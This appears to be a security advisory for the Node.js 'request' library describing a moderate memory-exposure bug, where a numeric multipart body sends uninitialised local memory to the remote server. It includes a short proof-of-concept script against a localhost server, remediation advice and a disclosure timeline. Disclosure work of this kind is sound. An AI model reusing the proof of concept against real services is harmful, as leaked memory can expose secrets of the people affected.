Severity: moderate

Remote Memory Exposure

request

Overview

Affected versions of request will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of body is number, then a buffer of that size will be allocated and sent to the remote server as the body.

Proof of Concept

var request = require('request');
var http = require('http');

var serveFunction = function (req, res){
    req.on('data', function (data) {
            console.log(data)
        });
    res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);

request({
    method: "POST",
    uri: 'http://localhost:8000',
    multipart: [{body:500}]
},function(err,res,body){});

Remediation

Update to version 2.68.0 or later

Advisory timeline

  1. published

    Advisory published
    Apr 14th, 2017
  2. reported

    Feb 1st, 2017